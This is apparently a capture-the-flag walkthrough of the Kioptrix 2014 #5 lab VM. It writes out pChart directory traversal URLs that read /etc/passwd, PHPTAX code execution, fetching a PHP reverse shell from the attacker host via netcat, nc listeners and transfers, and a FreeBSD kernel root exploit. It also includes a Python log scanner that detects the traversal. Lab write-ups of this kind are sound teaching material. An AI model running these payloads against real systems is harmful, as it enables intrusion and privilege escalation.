VulnHub - Kioptrix 2014 #5

Let's continue the Kioptrix series with Kioptrix 2014 #5.

## Objective

The Kioptrix series is aimed at beginners and the challenges are thus fairly easy. The objective is to get root access to the VM by any means possible, except by hacking the actual VM client. The purpose of these vulnerable VMs is to learn the basic techniques and tools used in penetration tests. There is more than one way of achieving the objective in this challenge.

The Kioptrix 2014 VM can be downloaded from here. Note that it is a VMware image and can be used in VMware Workstation or Player. You can convert the image to be compatible with VirtualBox.

## The Hack

The first step in every penetration test is intelligence gathering. This consists of passive / active recon and enumeration: find out which services on the target server are exposed to the world and which versions they are running, so that you can search for known vulnerabilities.

To achieve this we will be using a tool that will become the foundation of your pentesting toolkit: Nmap. The nmap man page can be found here; it explains all the options / flags / arguments usable with nmap.

nmap -vv --reason -sV -sC -Pn --min-rate=400 -T4 --script-timeout 10m -p- 192.168.163.137
Nmap scan report for 192.168.163.137
Host is up, received user-set (0.00088s latency).
Scanned at 2018-03-09 19:29:26 SAST for 109s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT     STATE  SERVICE REASON       VERSION
22/tcp   closed ssh     conn-refused
80/tcp   open   http    syn-ack      Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   http    syn-ack      Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar  9 19:31:15 2018 -- 1 IP address (1 host up) scanned in 110.47 seconds

Only two ports that we can access: 80 and 8080.

Let’s browse to ports 80 and 8080 and see what comes up.

Port 80:

Port 8080:

A default HTTP page on port 80 and a forbidden response on port 8080.

Let’s run nikto quickly and see what we get.

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.163.137
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 19:22:52 2014
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OPTIONS Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.163.137
+ Target Port: 8080
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST

Hmmm, so nothing really useful from nikto or dirbuster.

Have a look at the source of the “It works!” page.

 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

A hidden URL. Browse to it.

http://192.168.163.137/pChart2.1.3/index.php

redirects to

http://192.168.163.137/pChart2.1.3/examples/index.php


They are running an app called pChart, version 2.1.3. A quick search through exploit-db shows that directory traversal is possible.

apb@stratios:~$ searchsploit pChart
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                                                                                                   | exploits/php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
apb@stratios:~$ vim /usr/share/exploitdb/exploits/php/webapps/31173.txt
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.

The above tells us that it is possible to view files on the server that would otherwise be inaccessible. Let’s try the PoC and see if we can read the server’s passwd file.

Browse to http://192.168.163.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

Scary… we can read the passwd file.

Let’s see if we can read the Apache config and find anything relating to the forbidden response on port 8080.

The Apache config on FreeBSD is located at /usr/local/etc/apache22/httpd.conf.

Browse to http://192.168.163.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf

…And we can read the whole config. That is only the top part; the config is quite long. Keep reading for anything relating to port 8080.
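From the defender's side, the two traversal requests above leave a clear trace in the Apache access log. The following is an added example, not part of the original writeup: it scans constructed combined-format log lines for a pChart Script parameter that, after percent-decoding (including double encoding), escapes the examples directory.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed Apache combined-format log lines (not captured from the VM). Lines 1, 2
# and 4 carry the Action=View&Script= traversal pattern (line 4 double-encoded);
# line 3 is a legitimate request for one of the bundled example scripts.
SAMPLE_LOG = """\
192.168.163.128 - - [09/Mar/2018:19:40:01 +0200] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1839 "-" "Mozilla/5.0"
192.168.163.128 - - [09/Mar/2018:19:41:12 +0200] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf HTTP/1.1" 200 17902 "-" "Mozilla/5.0"
192.168.163.128 - - [09/Mar/2018:19:42:30 +0200] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBarChart.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.163.128 - - [09/Mar/2018:19:43:05 +0200] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1839 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise(value, max_rounds=3):
    """Percent-decode until stable (catches double encoding) and fold backslashes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def is_traversal(value):
    """True if a value meant to name a file inside examples/ escapes that directory."""
    path = normalise(value)
    return ".." in path.split("/") or path.startswith("/")


def scan_log(text, param="Script"):
    """Return (client, status, decoded Script value) for every traversal attempt."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlparse(m.group("target")).query
        # parse_qs strips one encoding layer; normalise() handles any further layers
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            if is_traversal(raw):
                findings.append((m.group("ip"), m.group("status"), normalise(raw)))
    return findings


if __name__ == "__main__":
    for client, status, target in scan_log(SAMPLE_LOG):
        print(f"{client} status={status} traversal -> {target}")
```

A 200 status on a flagged line means the file was actually served, which is what distinguishes a successful read from a blocked probe.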

So only browsers with a User-Agent of Mozilla 4 can access the site on port 8080. That’s relatively easy: no credentials needed. You can trick the web server by changing your browser’s user agent within Firefox.

After a quick Google search: we will have to add a new user agent string that overrides the default.

Mozilla/4.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0

Now let’s try to browse to port 8080.

Alternatively, if you do not want to modify Firefox, you can use curl:

apb@stratios:~$ curl -H "User-Agent:Mozilla/4.0" http://192.168.163.137:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>

There is a directory called phptax. Let’s browse to it and see what’s going on.

It is running some tax program called PHPTAX.

Quick search for known exploits.

apb@stratios:~$ searchsploit phptax
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                                                                                                            | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                                                                                                         | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                                                                                                        | exploits/php/webapps/21665.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

PHPTAX is vulnerable to remote code injection and there is a Metasploit module for it, but let’s try to compromise this target manually.

After researching the exploit, we are able to read, write and execute commands because of the feature in the app that is used to create PDFs.

I ran “id” and wrote the output to a file, out.txt, which we are able to browse to and read.

First I tried to use nc to create a reverse shell, but unfortunately the netcat installed on this FreeBSD server does not come with an execute option.

Move on to our next option: a PHP shell.

On Kali there is a PHP reverse shell from pentestmonkey.

To get the PHP shell onto the target machine, we will copy it to our web server and download it from the target machine.

root@stratios:~# cp /usr/share/webshells/php/php-reverse-shell.php  /var/www/html/shell.txt

Modify the script to connect to your Kali machine’s IP and whatever port you want to use.

Start httpd.

root@stratios:/etc/init.d# /etc/init.d/apache2 start

Now to get it over to the target machine.

wget is not installed.

We will have to get creative.

We will create a file on the target machine containing an HTTP GET request for the PHP shell on our web server.

Then we will pipe that request through netcat to download the file.

printf "GET http://192.168.163.128/shell.txt HTTP/1.0\r\n\r\n" > shell.txt

Confirm the file was created with the required content.

Now redirect that file into netcat to download the PHP shell.

Now we can set up nc to listen for incoming connections.

On Kali:

root@stratios:~# nc -nlvp 1234
listening on [any] 1234 ...

Run the shell:

root@stratios:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.163.128] from (UNKNOWN) [192.168.163.137] 30398
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
 7:07AM  up 5 hrs, 0 users, load averages: 0.02, 0.01, 0.00
USER       TTY      FROM                      LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
$ 

… And we have a limited shell!

Next, let’s look for a privilege escalation exploit.

We know the target is running FreeBSD 9.

apb@stratios:~$ searchsploit FreeBSD 9.0
--------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                 |  Path
                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation         | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation   | exploits/freebsd/local/26368.c
--------------------------------------------------------------- ----------------------------------------

Let’s try the first one.

Copy over the exploit using nc.

On your Kali machine:

root@stratios:# nc -lvp 12345 < 28718.c 
listening on [any] 12345 ...

On the target machine:
$ nc -nv 192.168.163.128 12345 > exploit.c
Connection to 192.168.163.128 12345 port [tcp/*] succeeded!

Back on the Kali machine:

root@stratios:/var/www/html# nc -lvp 12345 < 28718.c 
listening on [any] 12345 ...
192.168.163.137: inverse host lookup failed: Unknown host
connect to [192.168.163.128] from (UNKNOWN) [192.168.163.137] 63805

Confirm the exploit was copied over:

$ ls -l
total 40
-rw-rw-rw-  1 www    wheel  5563 Mar 23 02:09 exploit.c

Compile the exploit:

$ gcc exploit.c
exploit.c:178:2: warning: no newline at end of file
$ ls -l
total 64
-rwxrwxrwx  1 www    wheel  10408 Mar 23 02:12 a.out

Run the exploit:

$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

And we have root on the target machine! This vm was more challenging than the ones before but it was fun nonetheless.

Don’t forget to remove that user agent we added in firefox earlier!

Thanks for reading.
